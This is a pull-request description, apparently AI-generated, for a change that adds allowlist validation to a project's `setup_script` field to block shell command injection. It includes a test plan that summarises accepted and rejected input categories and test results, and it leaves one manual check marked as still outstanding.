Issue #179 floated path-only execution (rename to `setup_script_path`, require absolute path to executable file) and an inline allowlist as alternatives. This PR takes the inline-allowlist route. The DB has no projects with a `setup_script` set today, but the API surface, schema, frontend type, and existing `"npm install"` test data all assume free-text — path-only would have been a breaking change for negligible additional defense in this threat model. Confirmed with the maintainer before implementation.

## Test plan

- [x] `tests/test_setup_script_validation.sh` — 26 cases: 9 benign accepted, 13 malicious rejected (semicolon/and/or chains, pipes, backtick + dollar substitution, var expansion, redirection, subshell, escape, newline, length cap), 4 execution behaviors (benign runs, empty no-ops, malicious doesn't pivot, missing command exits non-zero). All passing.
- [x] `dashboard/backend/tests/test_projects.py` — 18/18 passing (API surface for `setup_script` unchanged).
- [x] `bash -n` syntax check on both modified scripts.
- [ ] Manually verify a project run with `setup_script: "npm install"` still installs deps in a workspace before merging.

Closes #179

🤖 Generated with [Claude Code](https://claude.com/claude-code)